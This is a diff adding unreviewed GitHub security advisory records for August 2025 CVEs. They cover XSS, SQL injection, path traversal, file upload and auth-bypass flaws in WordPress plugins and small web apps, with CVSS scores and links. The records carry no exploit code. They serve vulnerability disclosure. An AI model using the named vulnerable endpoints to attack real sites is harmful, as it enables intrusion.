b/advisories/unreviewed/2025/08/GHSA-5wwq-32rw-q57q/GHSA-5wwq-32rw-q57q.json new file mode 100644 index 0000000000000..21a1c0e93c27d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-5wwq-32rw-q57q/GHSA-5wwq-32rw-q57q.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5wwq-32rw-q57q", + "modified": "2025-08-01T06:31:36Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-54845" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54845" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json b/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json new file mode 100644 index 0000000000000..a0856b8c41428 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77fc-r534-vggp", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-5921" + ], + "details": "The SureForms WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both authenticated and unauthenticated users.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5921" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/052fb6cf-274e-468b-a7e0-0e7a1751ec75" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T06:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-839r-7hhg-xhqr/GHSA-839r-7hhg-xhqr.json b/advisories/unreviewed/2025/08/GHSA-839r-7hhg-xhqr/GHSA-839r-7hhg-xhqr.json new file mode 100644 index 0000000000000..0e0cbb979f12a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-839r-7hhg-xhqr/GHSA-839r-7hhg-xhqr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-839r-7hhg-xhqr", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-54939" + ], + "details": "LiteSpeed QUIC (LSQUIC) Library before 4.3.1 has an lsquic_engine_packet_in memory leak.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54939" + }, + { + "type": "WEB", + "url": "https://github.com/litespeedtech/lsquic/commit/4cd9252e77fb4a36b572e2167a84067d603d3b23" + }, + { + "type": "WEB", + "url": "https://github.com/litespeedtech/lsquic/blob/70486141724f85e97b08f510673e29f399bbae8f/CHANGELOG#L1-L3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T06:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-92q8-hhvh-7wgw/GHSA-92q8-hhvh-7wgw.json b/advisories/unreviewed/2025/08/GHSA-92q8-hhvh-7wgw/GHSA-92q8-hhvh-7wgw.json new file mode 100644 index 0000000000000..f659828a6f7d9 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-92q8-hhvh-7wgw/GHSA-92q8-hhvh-7wgw.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92q8-hhvh-7wgw", + "modified": "2025-08-01T06:31:36Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-54847" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54847" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-953m-q75r-54mh/GHSA-953m-q75r-54mh.json b/advisories/unreviewed/2025/08/GHSA-953m-q75r-54mh/GHSA-953m-q75r-54mh.json new file mode 100644 index 0000000000000..f357b9082d909 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-953m-q75r-54mh/GHSA-953m-q75r-54mh.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-953m-q75r-54mh", + "modified": "2025-08-01T06:31:34Z", + "published": "2025-08-01T06:31:34Z", + "aliases": [ + "CVE-2019-19145" + ], + "details": "Quantum SuperLoader 3 V94.0 005E.0h devices allow attackers to access the hardcoded fa account because there are only 65536 possible passwords.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19145" + }, + { + "type": "WEB", + "url": "https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0005.md" + }, + { + "type": "WEB", + "url": "https://www.dell.com/community/PowerVault/PowerVault-124T-Username-Password/td-p/3004075" + }, + { + "type": "WEB", + "url": "https://www.quantum.com/en/products/tape-storage/superloader-3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-521" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-9m93-62q8-9jmx/GHSA-9m93-62q8-9jmx.json b/advisories/unreviewed/2025/08/GHSA-9m93-62q8-9jmx/GHSA-9m93-62q8-9jmx.json new file mode 100644 index 0000000000000..bd6beeb52917e --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-9m93-62q8-9jmx/GHSA-9m93-62q8-9jmx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9m93-62q8-9jmx", + "modified": "2025-08-01T06:31:34Z", + "published": "2025-08-01T06:31:34Z", + "aliases": [ + "CVE-2025-53399" + ], + "details": "In Sipwise rtpengine before 13.4.1.1, an origin-validation error in the endpoint-learning logic of the media-relay core allows remote attackers to inject or intercept RTP/SRTP media streams via RTP packets (except when the relay is configured for strict source and learning disabled). Version 13.4.1.1 fixes the heuristic mode by limiting exposure to the first five packets, and introduces a recrypt flag that fully prevents SRTP attacks when both mitigations are enabled.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53399" + }, + { + "type": "WEB", + "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2025-01-rtpengine-improper-behavior-bleed-inject" + }, + { + "type": "WEB", + "url": "https://github.com/sipwise/rtpengine/commits/rfuchs/security" + }, + { + "type": "WEB", + "url": "https://github.com/sipwise/rtpengine/releases/tag/mr13.4.1.1" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2025/07/31/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-346" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-c3q9-524g-cc66/GHSA-c3q9-524g-cc66.json b/advisories/unreviewed/2025/08/GHSA-c3q9-524g-cc66/GHSA-c3q9-524g-cc66.json new file mode 100644 index 0000000000000..1c0cf6e9571e2 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-c3q9-524g-cc66/GHSA-c3q9-524g-cc66.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3q9-524g-cc66", + "modified": "2025-08-01T06:31:35Z", + "published": "2025-08-01T06:31:35Z", + "aliases": [ + "CVE-2025-54839" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54839" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-c85j-rwrh-2gg7/GHSA-c85j-rwrh-2gg7.json b/advisories/unreviewed/2025/08/GHSA-c85j-rwrh-2gg7/GHSA-c85j-rwrh-2gg7.json new file mode 100644 index 0000000000000..91726df679797 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-c85j-rwrh-2gg7/GHSA-c85j-rwrh-2gg7.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c85j-rwrh-2gg7", + "modified": "2025-08-01T06:31:35Z", + "published": "2025-08-01T06:31:35Z", + "aliases": [ + "CVE-2025-54840" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54840" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-cx49-pj9h-5v3x/GHSA-cx49-pj9h-5v3x.json b/advisories/unreviewed/2025/08/GHSA-cx49-pj9h-5v3x/GHSA-cx49-pj9h-5v3x.json new file mode 100644 index 0000000000000..59f0b75af2001 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-cx49-pj9h-5v3x/GHSA-cx49-pj9h-5v3x.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cx49-pj9h-5v3x", + "modified": "2025-08-01T06:31:36Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-54844" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54844" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-gjwj-2jpg-rvfj/GHSA-gjwj-2jpg-rvfj.json b/advisories/unreviewed/2025/08/GHSA-gjwj-2jpg-rvfj/GHSA-gjwj-2jpg-rvfj.json new file mode 100644 index 0000000000000..670bd4a8d2445 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gjwj-2jpg-rvfj/GHSA-gjwj-2jpg-rvfj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gjwj-2jpg-rvfj", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-8433" + ], + "details": "A vulnerability was found in code-projects Document Management System 1.0 and classified as critical. This issue affects the function unlink of the file /dell.php. The manipulation of the argument ID leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8433" + }, + { + "type": "WEB", + "url": "https://github.com/i-Corner/cve/issues/14" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-hvx5-p2cq-7pwr/GHSA-hvx5-p2cq-7pwr.json b/advisories/unreviewed/2025/08/GHSA-hvx5-p2cq-7pwr/GHSA-hvx5-p2cq-7pwr.json new file mode 100644 index 0000000000000..57282531afd49 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-hvx5-p2cq-7pwr/GHSA-hvx5-p2cq-7pwr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvx5-p2cq-7pwr", + "modified": "2025-08-01T06:31:38Z", + "published": "2025-08-01T06:31:38Z", + "aliases": [ + "CVE-2025-8436" + ], + "details": "A vulnerability was found in projectworlds Online Admission System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /viewdoc.php. The manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8436" + }, + { + "type": "WEB", + "url": "https://github.com/Sunhaobin318/CVE/issues/2" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625554" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T06:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-j35f-m58q-8w24/GHSA-j35f-m58q-8w24.json b/advisories/unreviewed/2025/08/GHSA-j35f-m58q-8w24/GHSA-j35f-m58q-8w24.json new file mode 100644 index 0000000000000..c8ad10cea8014 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-j35f-m58q-8w24/GHSA-j35f-m58q-8w24.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j35f-m58q-8w24", + "modified": "2025-08-01T06:31:35Z", + "published": "2025-08-01T06:31:35Z", + "aliases": [ + "CVE-2025-54657" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54657" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-m9c2-6frp-5rqq/GHSA-m9c2-6frp-5rqq.json b/advisories/unreviewed/2025/08/GHSA-m9c2-6frp-5rqq/GHSA-m9c2-6frp-5rqq.json new file mode 100644 index 0000000000000..139e54613d6dc --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-m9c2-6frp-5rqq/GHSA-m9c2-6frp-5rqq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9c2-6frp-5rqq", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-7725" + ], + "details": "The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons, OpenAI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the comment feature in all versions up to, and including, 26.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7725" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3334370%40contest-gallery%2Ftrunk&old=3333852%40contest-gallery%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/18003103-3a14-4cbc-8bed-87a8ab050308?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T05:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json b/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json new file mode 100644 index 0000000000000..559e6752382db --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw9f-f52p-chpp", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-8454" + ], + "details": "It was discovered that uscan, a tool to scan/watch upstream sources for new releases of software, included in devscripts (a collection of scripts to make the life of a Debian Package maintainer easier), skips OpenPGP verification for files already downloaded even if a previous verification did fail.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8454" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/1109251" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T06:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-p8qf-v424-747v/GHSA-p8qf-v424-747v.json b/advisories/unreviewed/2025/08/GHSA-p8qf-v424-747v/GHSA-p8qf-v424-747v.json new file mode 100644 index 0000000000000..173faf42144e3 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-p8qf-v424-747v/GHSA-p8qf-v424-747v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8qf-v424-747v", + "modified": "2025-08-01T06:31:36Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-54842" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54842" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-vg7v-jh28-wqc4/GHSA-vg7v-jh28-wqc4.json b/advisories/unreviewed/2025/08/GHSA-vg7v-jh28-wqc4/GHSA-vg7v-jh28-wqc4.json new file mode 100644 index 0000000000000..d65d62f2c1914 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-vg7v-jh28-wqc4/GHSA-vg7v-jh28-wqc4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg7v-jh28-wqc4", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-4523" + ], + "details": "The IDonate – Blood Donation, Request And Donor Management System plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the admin_donor_profile_view() function in versions 2.0.0 to 2.1.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose an administrator’s username, email address, and all donor fields.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4523" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/idonate/tags/2.1.9/src/Admin/Admin.php#L76" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/idonate/tags/2.1.9/src/Helpers/IDonateAjaxHandler.php#L48" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3334424" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/idonate/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5fe7668b-9d70-44b7-a347-3922c0b8684c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T05:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-w385-9f6g-63qc/GHSA-w385-9f6g-63qc.json b/advisories/unreviewed/2025/08/GHSA-w385-9f6g-63qc/GHSA-w385-9f6g-63qc.json new file mode 100644 index 0000000000000..66f23c68f42cc --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-w385-9f6g-63qc/GHSA-w385-9f6g-63qc.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w385-9f6g-63qc", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-31716" + ], + "details": "In bootloader, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31716" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1951157990262374401" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T06:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-w653-5cx5-9pff/GHSA-w653-5cx5-9pff.json b/advisories/unreviewed/2025/08/GHSA-w653-5cx5-9pff/GHSA-w653-5cx5-9pff.json new file mode 100644 index 0000000000000..8bf090c71e417 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-w653-5cx5-9pff/GHSA-w653-5cx5-9pff.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w653-5cx5-9pff", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-7443" + ], + "details": "The BerqWP – Automated All-In-One Page Speed Optimization for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the store_javascript_cache.php file in all versions up to, and including, 2.2.42. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7443" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/searchpro/trunk/api/store_javascript_cache.php#L14" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3330075/searchpro/trunk/api/register_apis.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d7dc644-ab83-4f03-998a-ec8eda695161?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T05:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wjw2-c8pq-fw6m/GHSA-wjw2-c8pq-fw6m.json b/advisories/unreviewed/2025/08/GHSA-wjw2-c8pq-fw6m/GHSA-wjw2-c8pq-fw6m.json new file mode 100644 index 0000000000000..205088303f4d5 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wjw2-c8pq-fw6m/GHSA-wjw2-c8pq-fw6m.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjw2-c8pq-fw6m", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-8435" + ], + "details": "A vulnerability was found in code-projects Online Movie Streaming 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin-control.php. The manipulation of the argument ID leads to missing authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8435" + }, + { + "type": "WEB", + "url": "https://github.com/i-Corner/cve/issues/15" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318463" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T05:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wwp4-g977-j8h6/GHSA-wwp4-g977-j8h6.json b/advisories/unreviewed/2025/08/GHSA-wwp4-g977-j8h6/GHSA-wwp4-g977-j8h6.json new file mode 100644 index 0000000000000..db8686f622f43 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wwp4-g977-j8h6/GHSA-wwp4-g977-j8h6.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwp4-g977-j8h6", + "modified": "2025-08-01T06:31:36Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-54846" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54846" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-x2xx-4qhp-2vqx/GHSA-x2xx-4qhp-2vqx.json b/advisories/unreviewed/2025/08/GHSA-x2xx-4qhp-2vqx/GHSA-x2xx-4qhp-2vqx.json new file mode 100644 index 0000000000000..57e905b379d6d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-x2xx-4qhp-2vqx/GHSA-x2xx-4qhp-2vqx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x2xx-4qhp-2vqx", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:36Z", + "aliases": [ + "CVE-2025-5947" + ], + "details": "The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.", + "severity": [ + { + "type": "CVSS_V3", + "score": 